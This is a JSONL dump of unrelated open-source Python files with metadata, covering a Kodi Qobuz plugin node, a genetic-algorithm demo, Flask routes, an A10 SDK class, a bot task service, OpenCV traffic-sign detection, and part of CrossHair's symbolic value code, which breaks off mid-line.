{"seq_id":"635315476","text":"# Copyright 2011 Joachim Basmaison, Cyril Leclerc\r\n#\r\n# This file is part of xbmc-qobuz.\r\n#\r\n# xbmc-qobuz is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# xbmc-qobuz is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with xbmc-qobuz. If not, see .\r\nimport pprint\r\n\r\nimport qobuz\r\nfrom constants import *\r\nfrom flag import NodeFlag\r\nfrom node import node\r\nfrom debug import info\r\n'''\r\n    NODE VIRTUAL PLAYLIST\r\n'''\r\nfrom data.virtual_playlist import cache_virtual_playlist\r\nfrom tag.playlist import TagPlaylist\r\nfrom tag.track import TagTrack\r\nfrom node_track import node_track\r\n\r\nclass node_virtual_playlist(node):\r\n\r\n    def __init__(self, parent = None, parameters = None):\r\n        super(node_virtual_playlist, self).__init__(parent, parameters)\r\n        self.type = NodeFlag.TYPE_NODE | NodeFlag.TYPE_VIRTUAL_PLAYLIST\r\n\r\n    def _build_down(self, lvl, flag = None):\r\n        o = cache_virtual_playlist()\r\n        data = o.get_data()\r\n        o.playlist.set_label('Poom')\r\n        self.set_label(o.playlist.get_label())\r\n        self.set_json(data)\r\n        for track in data['tracks']:\r\n            c = node_track()\r\n            c.set_json(track)\r\n            c.set_id(track['id'])\r\n            c.setLabel(track['title'])\r\n            c.set_url()\r\n            self.add_child(c)\r\n        return True\r\n\r\n    def _get_xbmc_items(self, list, lvl, flag):\r\n        for c in self.childs:\r\n            tag = TagTrack(c.get_json())\r\n            item = tag.getXbmcItem()\r\n            list.append((item.getProperty('path'), item, False))\r\n        return True\r\n\r\n\r\n","sub_path":"resources/lib/qobuz/node/virtual_playlist.py","file_name":"virtual_playlist.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"244932226","text":"from src.ga import *\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\niterations = 100\ngen_size = 100\n#points = np.array([(6, 0), (3, 1), (1, 2), (0, 3), (0, 4), (1, 5), (3, 6), (6, 7)])\npoints = rand_points(10)\nmut_rate = .1\n\n\ndef find_path():\n    prev_gen = None\n    for i in range(iterations):\n        prev_gen, avg_len, best = get_gen(points, prev_gen, gen_size, mut_rate)\n        if best is not None:\n            draw_graph(best, i)\n        print(\"{0} avg len: {1}\\n best len:{2}\".format(i, avg_len, evaluate(points, best)))\n\n\ndef draw_graph(ind, index):\n    G = nx.Graph()\n    prev = 
ind[0]\n nodes = dict()\n for i in range(points.shape[0]):\n nodes[i] = points[i]\n G.add_nodes_from(nodes.keys())\n for i in ind[1:]:\n p1 = int(prev)\n p2 = int(i)\n G.add_edge(p1, p2)\n prev = i\n nx.draw(G, nodes)\n plt.savefig(\"imgs/graph{0}.png\".format(index), format=\"PNG\")\n plt.clf()\n\n\n'''\np1 = rand_path(10)\np2 = rand_path(10)\nprint(p1)\nprint(p2)\nprint(get_child([p1, p2], .2))\n'''\nfind_path()\n'''\np1 = np.array([0, 1, 2, 3, 4, 5, 6, 7])\nprint(evaluate(points, p1))\n'''\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"433782718","text":"from flask import render_template, request, redirect, session, Markup\nfrom . import application\nimport pandas as pd\nfrom app.centrality import Centrality\nfrom app.svg_parse import SVGParse\n\n@application.route('/')\n@application.route('/index')\ndef index():\n return redirect('/form')\n \n@application.route('/form') \ndef my_form():\n return render_template('my-form.html') \n \n \n@application.route('/form', methods=['POST'])\ndef my_form_post():\n text = request.form['text']\n session['text_var'] = text\n return redirect('/results')\n \ndef get_ordered_nodes(node_id):\n centra = Centrality()\n node_path = centra.get_nodeset_path(node_id)\n graph = centra.get_graph(node_path)\n n_graph = centra.remove_redundant_nodes(graph)\n i_nodes = centra.get_eigen_centrality(n_graph)\n ordered_nodes = centra.sort_by_centrality(i_nodes)\n \n return ordered_nodes\n \ndef get_svg_file(node_id):\n c = Centrality()\n node_path = c.get_svg_path(node_id)\n svg = None\n try:\n with application.open_resource(node_path) as file:\n svg = file.read()\n except IOError:\n print('File was not found:')\n print(node_path)\n return svg\n \ndef get_svg_file_path(node_id):\n c = Centrality()\n node_path = c.get_svg_path(node_id)\n return node_path\n \n \n@application.route('/results') \ndef render_text():\n text = session.get('text_var', None)\n d = get_ordered_nodes(text)\n df = pd.DataFrame(data=d, columns=['id', 'text'])\n df = df[::-1]\n \n print(df.head())\n df['id'] = df['id'].astype(str)\n svg_file = get_svg_file(text)\n svgp = SVGParse()\n svg = svgp.parse_svg_file(svg_file)\n svg_df = svgp.get_node_ids(svg_file)\n #print(svg_df.head())\n svg_df['aifid'] = svg_df['aifid'].astype(str)\n merged_df = df.merge(svg_df, left_on=['id'], right_on=['aifid'], how='left')\n merged_df.drop(['id', 'aifid'], axis=1, inplace=True)\n \n print(merged_df.head())\n merged_df = merged_df[['nodeid', 'text']]\n \n items = merged_df.to_html(header=False, index=False)\n \n \n \n return render_template('results.html', title=text, table=[items], svg=Markup(svg))\n \n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"281575149","text":"from a10sdk.common.A10BaseClass import A10BaseClass\n\n\nclass Oper(A10BaseClass):\n \n \"\"\"This class does not support CRUD Operations please use parent.\n\n :param last_server: {\"type\": \"string\", \"format\": \"string\"}\n :param DeviceProxy: The device proxy for REST operations and session handling. 
Refer to `common/device_proxy.py`\n\n \n\n \n \"\"\"\n def __init__(self, **kwargs):\n self.ERROR_MSG = \"\"\n \n self.b_key = \"oper\"\n self.DeviceProxy = \"\"\n self.last_server = \"\"\n\n for keys, value in kwargs.items():\n setattr(self,keys, value)\n\n\nclass DnsNsRecord(A10BaseClass):\n \n \"\"\"Class Description::\n Operational Status for the object dns-ns-record.\n\n Class dns-ns-record supports CRUD Operations and inherits from `common/A10BaseClass`.\n This class is the `\"PARENT\"` class for this module.`\n\n :param ns_name: {\"description\": \"Specify Domain Name\", \"format\": \"string\", \"minLength\": 1, \"oid\": \"1001\", \"optional\": false, \"maxLength\": 127, \"type\": \"string\"}\n :param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`\n\n \n\n URL for this object::\n `https://<Hostname|Ip address>//axapi/v3/gslb/zone/{name}/service/{service_port}+{service_name}/dns-ns-record/{ns_name}/oper`.\n\n \n\n \n \"\"\"\n def __init__(self, **kwargs):\n self.ERROR_MSG = \"\"\n self.required=[]\n self.b_key = \"dns-ns-record\"\n self.a10_url=\"/axapi/v3/gslb/zone/{name}/service/{service_port}+{service_name}/dns-ns-record/{ns_name}/oper\"\n self.DeviceProxy = \"\"\n self.oper = {}\n self.ns_name = \"\"\n\n for keys, value in kwargs.items():\n setattr(self,keys, value)\n\n\n","sub_path":"a10sdk/core/gslb/gslb_zone_service_dns_ns_record_oper.py","file_name":"gslb_zone_service_dns_ns_record_oper.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"506949665","text":"magicNumber = 100\n'''\nAuthor: Jordan Garcia\n\nComments_\n\nLast Updated: February 24, 2018\n\nPurpose: Practice with break\n'''\n\n\nfor n in range(101):\n if n == magicNumber:\n print(\"magic number is found. It's Number \", n)\n break\nelse:\n print(\"Let us say there is no magic number\")","sub_path":"PersonalProjects/Learning Basics/Comments_Break.py","file_name":"Comments_Break.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"548143640","text":"\"\"\"\nCreated by anthony on 22.10.17\ntask_service\n\nif you are not sure which service should implement a function\nthen implement it in its return type service\ne.g. 
get all user's tasks: return type is Task -> task_service.find_all_by_user_id\n\"\"\"\nfrom config.db_config import db_session\nfrom models.task import Task\nfrom services import project_service, user_service\nfrom utils.service_utils import save, find_all, find_one_by_id\n\n\ndef find_tasks_by_title(title):\n all_tasks = find_all(Task)\n res = []\n for t in all_tasks:\n if title in t.title:\n res.append(t)\n\n return res\n\n\ndef find_task_by_id_and_user_id(task_id_value, user_id):\n task_id = int(task_id_value)\n task_by_id = find_one_by_id(task_id, Task)\n\n if task_by_id and task_by_id.get_user_id() == user_id:\n return task_by_id\n\n else:\n return None\n\n\ndef find_tasks_by_user_id(user_id_value):\n user_id = int(user_id_value)\n all_tasks = find_all(Task)\n tasks_by_user = [t for t in all_tasks if user_id == t.get_user_id()]\n return tasks_by_user\n\n\ndef find_nearest_task(user_id, project_id):\n all_tasks = find_all(Task)\n tasks_by_user_id = filter(\n lambda t: t.get_user_id() == user_id and t.get_project_id() == project_id, all_tasks)\n\n sorted_by_remind_date = sorted(\n tasks_by_user_id, key=lambda t: t.get_next_remind_date())\n\n return sorted_by_remind_date[0]\n\n\ndef create_task(update):\n # create or get user\n chat = update.message.chat\n user = user_service.create_or_get_user(chat)\n\n # create or get project\n msg_text = update.message.text\n project = project_service.create_or_get_project(msg_text, user.get_id())\n\n if project and user:\n new_task = Task(description=msg_text, user_id=user.get_id(), project_id=project.get_id())\n saved_task = save(new_task)\n\n project_service.update_nearest_task_for_project(project.get_id())\n\n return saved_task\n\n else:\n raise ValueError('Project/User could not be created')\n","sub_path":"services/task_service.py","file_name":"task_service.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"506454555","text":"import glob\nimport cv2\nimport numpy as np\nfrom task1_bbox_prediction_utils import predictBlueTSBoundingBox, predictRedTSBoundingBox, predictYellowTSBoundingBox, predictLargeRedBoundingBox, predictLargeBoundingBox\n\ndef predict_bboxes(image):\n img = np.copy(image)\n\n cannyLowerThres = 10\n cannyUpperThres = 50\n\n brown_lower = np.array([10,100,20], dtype=np.uint8)\n brown_upper = np.array([20,255,200], dtype=np.uint8)\n\n yellow_lower = np.array([20, 100, 100], dtype = np.uint8)\n yellow_upper = np.array([30, 255, 255], dtype = np.uint8)\n\n red_lower1 = np.array([0,70,50], dtype=np.uint8)\n red_upper1 = np.array([10, 255, 255], dtype=np.uint8)\n red_lower2 = np.array([170,70,50], dtype=np.uint8)\n red_upper2 = np.array([180, 255, 200], dtype=np.uint8)\n\n blue_lower = np.array([70,40,0],np.uint8) #100, 150\n blue_upper = np.array([140,255,255],np.uint8)\n\n blueBB = predictBlueTSBoundingBox(img, blue_lower, blue_upper, cannyLowerThres, cannyUpperThres)\n redBB = predictRedTSBoundingBox(img, blueBB, red_lower1, red_upper1, red_lower2, red_upper2, cannyLowerThres, cannyUpperThres)\n yellowBB = predictYellowTSBoundingBox(img, blueBB, redBB, yellow_lower, yellow_upper, cannyLowerThres, cannyUpperThres)#\n redLargeBB = predictLargeRedBoundingBox(img, red_lower1, red_upper1, red_lower2, red_upper2, cannyLowerThres, cannyUpperThres)#\n largeBB = predictLargeBoundingBox(img, blueBB, redBB, yellowBB, brown_lower, brown_upper, blue_lower, blue_upper, cannyLowerThres, cannyUpperThres)\n\n return yellowBB, redLargeBB, largeBB\n\ndef 
test():\n rgbImagePath1 \t= glob.glob('../CVS_HW_FILES/g1/rgb/*.jpg')\t\t# 20 images\n rgbImagePath2 \t= glob.glob('../CVS_HW_FILES/g2/rgb/*.jpg')\t\t# 16 images\n rgbImagePath3 \t= glob.glob('../CVS_HW_FILES/g3/rgb/*.jpg')\t\t# 19 images\n rgbImagePath4 \t= glob.glob('../CVS_HW_FILES/g4/rgb/*.jpg')\t\t# 15 images\n\n trainPath \t\t= rgbImagePath1 + rgbImagePath2 + rgbImagePath3\t# 55 images || indices of images with different lighting conditions: 18, 34, 53\n valPath\t\t\t= rgbImagePath4\t\t\t\t\t\t\t\t\t# 15 images || indices of images with different lighting conditions: 12\n\n for i in range(len(trainPath)):\n image = cv2.imread(trainPath[i])\n yellowBB, redLargeBB, largeBB = predict_bboxes(image)\n for box in yellowBB:\n x1, y1, x2, y2 = box[0], box[1], box[2], box[3] \n cv2.rectangle(image, (x1,y1), (x2,y2), (0,0,255), 2)\n \n cv2.imwrite('../FinalTest/{}.jpg'.format(i), image)\n\n\n\n","sub_path":"task1_bbox_prediction.py","file_name":"task1_bbox_prediction.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"183623506","text":"import collections\nimport contextlib\nimport copy\nimport enum\nimport functools\nimport io\nimport operator\nimport re\nimport typing\nfrom typing import *\nimport builtins as orig_builtins\n\nfrom crosshair.abcstring import AbcString\nfrom crosshair.core import register_patch\nfrom crosshair.core import register_type\nfrom crosshair.core import realize\nfrom crosshair.core import proxy_for_type\nfrom crosshair.core import python_type\nfrom crosshair.core import normalize_pytype\nfrom crosshair.core import choose_type\nfrom crosshair.core import CrossHairValue\nfrom crosshair.core import SmtProxyMarker\nfrom crosshair.core import type_arg_of\nfrom crosshair.core import type_args_of\nfrom crosshair.core import name_of_type\nfrom crosshair.core import with_realized_args\nfrom crosshair.objectproxy import ObjectProxy\nfrom crosshair.simplestructs import SimpleDict\nfrom crosshair.simplestructs import SequenceConcatenation\nfrom crosshair.simplestructs import SliceView\nfrom crosshair.simplestructs import ShellMutableSequence\nfrom crosshair.statespace import StateSpace\nfrom crosshair.statespace import HeapRef\nfrom crosshair.statespace import SnapshotRef\nfrom crosshair.statespace import model_value_to_python\nfrom crosshair.type_repo import PYTYPE_SORT\nfrom crosshair.util import debug\nfrom crosshair.util import CrosshairInternal\nfrom crosshair.util import CrosshairUnsupported\nfrom crosshair.util import IgnoreAttempt\nfrom crosshair.util import is_iterable\nfrom crosshair.util import is_hashable\n\nimport z3 # type: ignore\n\nclass _Missing(enum.Enum):\n value = 0\n\n_MISSING = _Missing.value\n\n\ndef smt_min(x, y):\n if x is y:\n return x\n return z3.If(x <= y, x, y)\n\ndef smt_sort_has_heapref(sort: z3.SortRef) -> bool:\n return 'HeapRef' in str(sort) # TODO: don't do this :)\n\n_HEAPABLE_PYTYPES = set([int, float, str, bool, type(None), complex])\n\ndef pytype_uses_heap(typ: Type) -> bool:\n return not (typ in _HEAPABLE_PYTYPES)\n\ndef typeable_value(val: object) -> object:\n '''\n Forces values of unknown type (SmtObject) into a typed (but possibly still symbolic) value.\n '''\n while type(val) is SmtObject:\n val = cast(SmtObject, val)._wrapped()\n return val\n\n_SMT_FLOAT_SORT = z3.RealSort() # difficulty getting the solver to use z3.Float64()\n\n_TYPE_TO_SMT_SORT = {\n bool: z3.BoolSort(),\n str: z3.StringSort(),\n int: z3.IntSort(),\n float: _SMT_FLOAT_SORT,\n}\n\n\ndef possibly_missing_sort(sort):\n datatype = 
z3.Datatype('optional_' + str(sort) + '_')\n datatype.declare('missing')\n datatype.declare('present', ('valueat', sort))\n ret = datatype.create()\n return ret\n\n\ndef type_to_smt_sort(t: Type) -> z3.SortRef:\n t = normalize_pytype(t)\n if t in _TYPE_TO_SMT_SORT:\n return _TYPE_TO_SMT_SORT[t]\n origin = origin_of(t)\n if origin is type:\n return PYTYPE_SORT\n return HeapRef\n\nSmtGenerator = Callable[[StateSpace, type, Union[str, z3.ExprRef]], object]\n\n_PYTYPE_TO_WRAPPER_TYPE: Dict[type, SmtGenerator] = {} # to be populated later\n_WRAPPER_TYPE_TO_PYTYPE: Dict[SmtGenerator, type] = {}\n\ndef origin_of(typ: Type) -> Type:\n typ = _WRAPPER_TYPE_TO_PYTYPE.get(typ, typ)\n if hasattr(typ, '__origin__'):\n return typ.__origin__\n return typ\n\ndef crosshair_type_for_python_type(typ: Type) -> Optional[SmtGenerator]:\n typ = normalize_pytype(typ)\n origin = origin_of(typ)\n return _PYTYPE_TO_WRAPPER_TYPE.get(origin)\n\n\ndef smt_bool_to_int(a: z3.ExprRef) -> z3.ExprRef:\n return z3.If(a, 1, 0)\n\n\ndef smt_int_to_float(a: z3.ExprRef) -> z3.ExprRef:\n if _SMT_FLOAT_SORT == z3.Float64():\n return z3.fpRealToFP(z3.RNE(), z3.ToReal(a), _SMT_FLOAT_SORT)\n elif _SMT_FLOAT_SORT == z3.RealSort():\n return z3.ToReal(a)\n else:\n raise CrosshairInternal()\n\n\ndef smt_bool_to_float(a: z3.ExprRef) -> z3.ExprRef:\n if _SMT_FLOAT_SORT == z3.Float64():\n return z3.If(a, z3.FPVal(1.0, _SMT_FLOAT_SORT), z3.FPVal(0.0, _SMT_FLOAT_SORT))\n elif _SMT_FLOAT_SORT == z3.RealSort():\n return z3.If(a, z3.RealVal(1), z3.RealVal(0))\n else:\n raise CrosshairInternal()\n\n_IMPLICIT_SORT_CONVERSIONS: Dict[Tuple[z3.SortRef, z3.SortRef], Callable[[z3.ExprRef], z3.ExprRef]] = {\n (z3.BoolSort(), z3.IntSort()): smt_bool_to_int,\n (z3.BoolSort(), _SMT_FLOAT_SORT): smt_bool_to_float,\n (z3.IntSort(), _SMT_FLOAT_SORT): smt_int_to_float,\n}\n\n_LITERAL_PROMOTION_FNS = {\n bool: z3.BoolVal,\n int: z3.IntVal,\n float: z3.RealVal if _SMT_FLOAT_SORT == z3.RealSort() else (lambda v: z3.FPVal(v, _SMT_FLOAT_SORT)),\n str: z3.StringVal,\n}\n\ndef smt_coerce(val: Any) -> z3.ExprRef:\n if isinstance(val, SmtBackedValue):\n return val.var\n return val\n\ndef force_to_smt_sort(space: StateSpace, input_value: Any, desired_sort: z3.SortRef) -> z3.ExprRef:\n ret = coerce_to_smt_sort(space, input_value, desired_sort)\n if ret is None:\n raise TypeError('Could not derive smt sort ' + str(desired_sort))\n return ret\n\ndef coerce_to_smt_sort(space: StateSpace, input_value: Any, desired_sort: z3.SortRef) -> Optional[z3.ExprRef]:\n natural_value = None\n input_value = typeable_value(input_value)\n promotion_fn = _LITERAL_PROMOTION_FNS.get(type(input_value))\n if isinstance(input_value, SmtBackedValue):\n natural_value = input_value.var\n if type(natural_value) is tuple:\n # Many container types aren't described by a single z3 value:\n return None\n elif promotion_fn:\n natural_value = promotion_fn(input_value)\n elif isinstance(input_value, z3.ExprRef):\n natural_value = input_value\n natural_sort = natural_value.sort() if natural_value is not None else None\n conversion_fn = _IMPLICIT_SORT_CONVERSIONS.get((natural_sort, desired_sort))\n if conversion_fn:\n return conversion_fn(natural_value)\n if natural_sort == desired_sort:\n return natural_value\n if desired_sort == HeapRef:\n return space.find_val_in_heap(input_value)\n if desired_sort == PYTYPE_SORT and isinstance(input_value, type):\n return space.type_repo.get_type(input_value)\n return None\n\n\ndef coerce_to_smt_var(space: StateSpace, v: Any) -> z3.ExprRef:\n v = typeable_value(v)\n if 
isinstance(v, SmtBackedValue):\n return v.var\n promotion_fn = _LITERAL_PROMOTION_FNS.get(type(v))\n if promotion_fn:\n return promotion_fn(v)\n return space.find_val_in_heap(v)\n\n\ndef smt_to_ch_value(space: StateSpace, snapshot: SnapshotRef, smt_val: z3.ExprRef, pytype: type) -> object:\n def proxy_generator(typ: Type) -> object:\n return proxy_for_type(typ, space, 'heapval' + str(typ) + space.uniq())\n if smt_val.sort() == HeapRef:\n return space.find_key_in_heap(smt_val, pytype, proxy_generator, snapshot)\n ch_type = crosshair_type_for_python_type(pytype)\n assert ch_type is not None\n return ch_type(space, pytype, smt_val)\n\n\ndef attr_on_ch_value(other: Any, statespace: StateSpace, attr: str) -> object:\n if not isinstance(other, CrossHairValue):\n smt_var = coerce_to_smt_var(statespace, other)\n py_type = python_type(other)\n Typ = crosshair_type_for_python_type(py_type)\n if Typ is None:\n raise TypeError\n other = Typ(statespace, py_type, smt_var)\n if not hasattr(other, attr):\n raise TypeError\n return getattr(other, attr)\n\nclass SmtBackedValue(CrossHairValue):\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: object):\n self.statespace = statespace\n self.snapshot = SnapshotRef(-1)\n self.python_type = typ\n if isinstance(smtvar, str):\n self.var = self.__init_var__(typ, smtvar)\n else:\n self.var = smtvar\n # TODO test that smtvar's sort matches expected?\n\n def __init_var__(self, typ, varname):\n z3type = type_to_smt_sort(typ)\n return z3.Const(varname, z3type)\n\n def __deepcopy__(self, memo):\n shallow = copy.copy(self)\n shallow.snapshot = self.statespace.current_snapshot()\n return shallow\n\n def __bool__(self):\n return NotImplemented\n\n def __eq__(self, other):\n coerced = coerce_to_smt_sort(self.statespace, other, self.var.sort())\n if coerced is None:\n return False\n return SmtBool(self.statespace, bool, self.var == coerced)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __req__(self, other):\n return self.__eq__(other)\n\n def __rne__(self, other):\n return attr_on_ch_value(other, self.statespace, '__ne__')(self)\n\n def __lt__(self, other):\n raise TypeError\n\n def __gt__(self, other):\n raise TypeError\n\n def __le__(self, other):\n raise TypeError\n\n def __ge__(self, other):\n raise TypeError\n\n def __add__(self, other):\n raise TypeError\n\n def __sub__(self, other):\n raise TypeError\n\n def __mul__(self, other):\n raise TypeError\n\n def __pow__(self, other):\n raise TypeError\n\n def __truediv__(self, other):\n raise TypeError\n\n def __floordiv__(self, other):\n raise TypeError\n\n def __mod__(self, other):\n raise TypeError\n\n def __and__(self, other):\n raise TypeError\n\n def __or__(self, other):\n raise TypeError\n\n def __xor__(self, other):\n raise TypeError\n\n def __ch_pytype__(self):\n return self.python_type\n\n def __ch_realize__(self):\n return origin_of(self.python_type)(self)\n\n def __ch_forget_contents__(self, space: StateSpace):\n clean_smt = type(self)(space, self.python_type,\n str(self.var) + space.uniq())\n self.var = clean_smt.var\n\n def _binary_op(self, other, smt_op, py_op=None, expected_sort=None):\n #debug(f'binary op ({smt_op}) on value of type {type(other)}')\n left = self.var\n if expected_sort is None:\n expected_sort = type_to_smt_sort(self.python_type)\n right = coerce_to_smt_sort(self.statespace, other, expected_sort)\n if right is None:\n return py_op(realize(self), realize(other))\n try:\n ret = smt_op(left, right)\n except z3.z3types.Z3Exception as e:\n debug('Raising z3 
error as Python TypeError: ', str(e))\n raise TypeError\n return self.__class__(self.statespace, self.python_type, ret)\n\n def _unary_op(self, op):\n return self.__class__(self.statespace, self.python_type, op(self.var))\n\n\nclass SmtNumberAble(SmtBackedValue):\n def _numeric_binary_smt_op(self, other, op) -> Optional[Tuple[z3.ExprRef, type]]:\n other = typeable_value(other)\n if type(other) is SmtBool:\n # at a minimum, promote to an integer (in case both values are booleans)\n other = convert(other, int)\n l_val, r_val = convert_to_common_type(self, typeable_value(other))\n l_pytype = python_type(l_val)\n r_pytype = python_type(r_val)\n if l_pytype != r_pytype:\n return None\n l_var = coerce_to_smt_var(self.statespace, l_val)\n r_var = coerce_to_smt_var(self.statespace, r_val)\n return (op(l_var, r_var), l_pytype)\n\n def _numeric_binary_op(self, other, op, op_result_pytype=None):\n if type(other) == complex:\n return op(complex(self), complex(other))\n result = self._numeric_binary_smt_op(other, op)\n if result is None:\n raise TypeError\n smt_result, common_pytype = result\n if op_result_pytype is not None:\n common_pytype = op_result_pytype\n cls = _PYTYPE_TO_WRAPPER_TYPE[common_pytype]\n return cls(self.statespace, common_pytype, smt_result)\n\n def __pos__(self):\n return self\n\n def __neg__(self):\n return self._unary_op(operator.neg)\n\n def __abs__(self):\n return self._unary_op(lambda v: z3.If(v < 0, -v, v))\n\n def __lt__(self, other):\n return self._numeric_binary_op(other, operator.lt, op_result_pytype=bool)\n\n def __gt__(self, other):\n return self._numeric_binary_op(other, operator.gt, op_result_pytype=bool)\n\n def __le__(self, other):\n return self._numeric_binary_op(other, operator.le, op_result_pytype=bool)\n\n def __ge__(self, other):\n return self._numeric_binary_op(other, operator.ge, op_result_pytype=bool)\n\n def __eq__(self, other):\n # Note this is a little different than the other comparison operations, because\n # equality doesn't raise TypeErrors on mismatched types\n result = self._numeric_binary_smt_op(other, operator.eq)\n if result is None:\n return False\n return SmtBool(self.statespace, bool, result[0])\n\n def __add__(self, other):\n return self._numeric_binary_op(other, operator.add)\n\n def __sub__(self, other):\n return self._numeric_binary_op(other, operator.sub)\n\n def __mul__(self, other):\n if isinstance(other, (str, SmtStr, collections.abc.Sequence)):\n return other.__mul__(self)\n return self._numeric_binary_op(other, operator.mul)\n\n def __pow__(self, other):\n if other < 0 and self == 0:\n raise ZeroDivisionError\n return self._numeric_binary_op(other, operator.pow)\n\n def __rmul__(self, other):\n return attr_on_ch_value(other, self.statespace, '__mul__')(self)\n\n def __radd__(self, other):\n return attr_on_ch_value(other, self.statespace, '__add__')(self)\n\n def __rsub__(self, other):\n return attr_on_ch_value(other, self.statespace, '__sub__')(self)\n\n def __rtruediv__(self, other):\n return attr_on_ch_value(other, self.statespace, '__truediv__')(self)\n\n def __rfloordiv__(self, other):\n return attr_on_ch_value(other, self.statespace, '__floordiv__')(self)\n\n def __rmod__(self, other):\n return attr_on_ch_value(other, self.statespace, '__mod__')(self)\n\n def __rdivmod__(self, other):\n return attr_on_ch_value(other, self.statespace, '__divmod__')(self)\n\n def __rpow__(self, other):\n return attr_on_ch_value(other, self.statespace, '__pow__')(self)\n\n def __rlshift__(self, other):\n return attr_on_ch_value(other, 
self.statespace, '__lshift__')(self)\n\n def __rrshift__(self, other):\n return attr_on_ch_value(other, self.statespace, '__rshift__')(self)\n\n def __rand__(self, other):\n return attr_on_ch_value(other, self.statespace, '__and__')(self)\n\n def __rxor__(self, other):\n return attr_on_ch_value(other, self.statespace, '__xor__')(self)\n\n def __ror__(self, other):\n return attr_on_ch_value(other, self.statespace, '__or__')(self)\n\nclass SmtIntable(SmtNumberAble):\n # bitwise operators\n def __invert__(self):\n return -(self + 1)\n\n def __lshift__(self, other):\n if other < 0:\n raise ValueError('negative shift count')\n return self * (2 ** other)\n\n def __rshift__(self, other):\n if other < 0:\n raise ValueError('negative shift count')\n return self // (2 ** other)\n\n def _apply_bitwise(self, op: Callable, v1: int, v2: int) -> int:\n if (not hasattr(v1, '__index__')) or (not hasattr(v2, '__index__')):\n raise TypeError\n return op(v1.__index__(), v2.__index__())\n\n def __and__(self, other):\n return self._apply_bitwise(operator.and_, self, other)\n\n def __or__(self, other):\n return self._apply_bitwise(operator.or_, self, other)\n\n def __xor__(self, other):\n return self._apply_bitwise(operator.xor, self, other)\n\n def __truediv__(self, other):\n return self.__float__() / other\n\n def __divmod__(self, other):\n return (self // other, self % other)\n\n def __floordiv__(self, other):\n if other == 0:\n raise ZeroDivisionError()\n if not isinstance(other, (bool, int, SmtInt, SmtBool)):\n return realize(self) // realize(other)\n return self._numeric_binary_op(other, lambda x, y: z3.If(\n x % y == 0 or x >= 0, x / y, z3.If(y >= 0, x / y + 1, x / y - 1)))\n\n def __mod__(self, other):\n if other == 0:\n raise ZeroDivisionError()\n if not isinstance(other, (bool, int, SmtInt, SmtBool)):\n return realize(self) % realize(other)\n return self._numeric_binary_op(other, operator.mod)\n\n\nclass SmtBool(SmtIntable):\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: object):\n assert typ == bool\n SmtBackedValue.__init__(self, statespace, typ, smtvar)\n\n def __neg__(self):\n return SmtInt(self.statespace, int, -smt_bool_to_int(self.var))\n\n def __repr__(self):\n return self.__bool__().__repr__()\n\n def __hash__(self):\n return self.__bool__().__hash__()\n\n def __index__(self):\n return SmtInt(self.statespace, int, smt_bool_to_int(self.var))\n\n def __xor__(self, other):\n return self._binary_op(other, z3.Xor)\n\n def __bool__(self):\n return self.statespace.choose_possible(self.var)\n\n def __int__(self):\n return SmtInt(self.statespace, int, smt_bool_to_int(self.var))\n\n def __float__(self):\n return SmtFloat(self.statespace, float, smt_bool_to_float(self.var))\n\n def __complex__(self):\n return complex(self.__float__())\n\n def __add__(self, other):\n return self._numeric_binary_op(other, operator.add)\n\n def __sub__(self, other):\n return self._numeric_binary_op(other, operator.sub)\n\n\nclass SmtInt(SmtIntable):\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: Union[str, z3.ArithRef]):\n assert typ == int\n assert type(smtvar) != int\n SmtIntable.__init__(self, statespace, typ, smtvar)\n\n def __repr__(self):\n return self.__index__().__repr__()\n\n def __hash__(self):\n return self.__index__().__hash__()\n\n def __float__(self):\n return SmtFloat(self.statespace, float, smt_int_to_float(self.var))\n\n def __complex__(self):\n return complex(self.__float__())\n\n def __index__(self):\n #debug('WARNING: attempting to materialize symbolic integer. 
Trace:')\n # traceback.print_stack()\n if self == 0:\n return 0\n ret = self.statespace.find_model_value(self.var)\n assert type(ret) is int\n return ret\n\n def __bool__(self):\n return SmtBool(self.statespace, bool, self.var != 0).__bool__()\n\n def __int__(self):\n return self.__index__()\n\n\n_Z3_ONE_HALF = z3.RealVal(\"1/2\")\n\n\nclass SmtFloat(SmtNumberAble):\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: object):\n assert typ == float\n SmtBackedValue.__init__(self, statespace, typ, smtvar)\n\n def __repr__(self):\n return self.statespace.find_model_value(self.var).__repr__()\n\n def __hash__(self):\n return self.statespace.find_model_value(self.var).__hash__()\n\n def __bool__(self):\n return SmtBool(self.statespace, bool, self.var != 0).__bool__()\n \n def __float__(self):\n return self.statespace.find_model_value(self.var).__float__()\n\n def __complex__(self):\n return complex(self.__float__())\n\n def __round__(self, ndigits=None):\n if ndigits is not None:\n factor = 10 ** ndigits\n return round(self * factor) / factor\n else:\n var, floor, nearest = self.var, z3.ToInt(\n self.var), z3.ToInt(self.var + 